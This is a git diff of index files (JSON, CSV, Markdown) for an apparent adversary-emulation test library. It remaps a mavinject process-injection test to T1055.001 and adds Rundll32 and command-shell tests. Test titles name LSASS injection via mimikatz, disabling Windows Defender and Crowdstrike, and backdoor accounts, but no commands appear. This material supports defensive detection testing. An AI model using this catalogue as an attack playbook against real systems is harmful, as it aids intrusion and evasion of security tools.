","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 615157ed30..245c516dcb 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -28,6 +28,7 @@ privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/cront privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1546.014,Emond,1,Persistance with Event Monitor - emond,23c9c127-322b-4c75-95ca-eff464906114,sh privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt @@ -51,9 +52,8 @@ privilege-escalation,T1547.011,Plist Modification,1,Plist Modification,394a538e- privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1037.004,Rc.common,1,rc.common,97a48daa-8bca-4bc0-b1a9-c1d163e762de,bash privilege-escalation,T1547.007,Re-opened Applications,1,Re-Opened Applications,5fefd767-ef54-4ac6-84d3-751ab85e8aba,manual privilege-escalation,T1547.007,Re-opened Applications,2,Re-Opened Applications,5f5b71da-e03f-42e7-ac98-d63f9e0465cb,sh @@ -364,6 +364,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell +defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh defense-evasion,T1070.004,File Deletion,2,Delete an entire folder - Linux/macOS,a415f17e-ce8d-4ce2-a8b4-83b674e7017e,sh defense-evasion,T1070.004,File Deletion,3,Overwrite and delete a file with shred,039b4b10-2900-404b-b67f-4b6d49aa6499,sh @@ -465,9 +466,8 @@ defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Fi defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell @@ -496,6 +496,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt +defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh @@ -736,6 +737,7 @@ execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell +execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 75f7c4bc62..2ca098310b 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -90,6 +90,7 @@ privilege-escalation,T1546.001,Change Default File Association,1,Change Default privilege-escalation,T1574.001,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll,8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3,command_prompt privilege-escalation,T1574.002,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary,65526037-7079-44a9-bda1-2cb624838040,command_prompt privilege-escalation,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin priviliges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt +privilege-escalation,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell privilege-escalation,T1546.012,Image File Execution Options Injection,1,IFEO Add Debugger,fdda2626-5234-4c90-b163-60849a24c0b8,command_prompt privilege-escalation,T1546.012,Image File Execution Options Injection,2,IFEO Global Flags,46b1f278-c8ee-4aa5-acce-65e77b11f3c1,command_prompt privilege-escalation,T1078.003,Local Accounts,1,Create local account with admin priviliges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt @@ -104,9 +105,8 @@ privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -privilege-escalation,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +privilege-escalation,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell @@ -197,6 +197,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell +defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell defense-evasion,T1070.004,File Deletion,4,Delete a single file - Windows cmd,861ea0b4-708a-4d17-848d-186c9c7f17e3,command_prompt defense-evasion,T1070.004,File Deletion,5,Delete an entire folder - Windows cmd,ded937c4-2add-42f7-9c2c-c742b7a98698,command_prompt defense-evasion,T1070.004,File Deletion,6,Delete a single file - Windows PowerShell,9dee89bd-9a98-4c4f-9e2d-4256690b0e72,powershell @@ -267,9 +268,8 @@ defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Fi defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell -defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell -defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell -defense-evasion,T1055,Process Injection,3,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt +defense-evasion,T1055,Process Injection,1,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell +defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via mimikatz,3203ad24-168e-4bec-be36-f79b13ef8a83,command_prompt defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell @@ -295,6 +295,7 @@ defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-c defense-evasion,T1218.011,Rundll32,5,Rundll32 syssetup.dll Execution,41fa324a-3946-401e-bbdd-d7991c628125,command_prompt defense-evasion,T1218.011,Rundll32,6,Rundll32 setupapi.dll Execution,71d771cd-d6b3-4f34-bc76-a63d47a10b19,command_prompt defense-evasion,T1218.011,Rundll32,7,Execution of HTA and VBS Files using Rundll32 and URL.dll,22cfde89-befe-4e15-9753-47306b37a6e3,command_prompt +defense-evasion,T1218.011,Rundll32,8,Launches an executable using Rundll32 and pcwutl.dll,9f5d081a-ee5a-42f9-a04e-b7bdc487e676,command_prompt defense-evasion,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell defense-evasion,T1574.011,Services Registry Permissions Weakness,2,Service ImagePath Change with reg.exe,f38e9eea-e1d7-4ba6-b716-584791963827,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt @@ -551,6 +552,7 @@ execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell +execution,T1059.003,Windows Command Shell,2,Writes text to a file and displays it.,127b4afe-2346-4192-815c-69042bec570e,command_prompt execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt execution,T1047,Windows Management Instrumentation,3,WMI Reconnaissance Software,718aebaa-d0e0-471a-8241-c5afa69c7414,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index c119ad3dfa..3201ae2f0a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -55,7 +55,8 @@ - Atomic Test #1: Enable Guest account with RDP capability and admin priviliges [windows] - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1546.014 Emond](../../T1546.014/T1546.014.md) - Atomic Test #1: Persistance with Event Monitor - emond [macos] @@ -115,9 +116,8 @@ - Atomic Test #1: Process Hollowing using PowerShell [windows] - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] - - Atomic Test #2: Shellcode execution via VBA [windows] - - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] - T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1037.004 Rc.common](../../T1037.004/T1037.004.md) - Atomic Test #1: rc.common [macos] @@ -685,7 +685,8 @@ - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601.002 Downgrade System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1055.001 Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1055.001 Dynamic-link Library Injection](../../T1055.001/T1055.001.md) + - Atomic Test #1: Process Injection via mavinject.exe [windows] - T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) @@ -850,9 +851,8 @@ - Atomic Test #1: Process Hollowing using PowerShell [windows] - Atomic Test #2: RunPE via VBA [windows] - [T1055 Process Injection](../../T1055/T1055.md) - - Atomic Test #1: Process Injection via mavinject.exe [windows] - - Atomic Test #2: Shellcode execution via VBA [windows] - - Atomic Test #3: Remote Process Injection in LSASS via mimikatz [windows] + - Atomic Test #1: Shellcode execution via VBA [windows] + - Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows] - 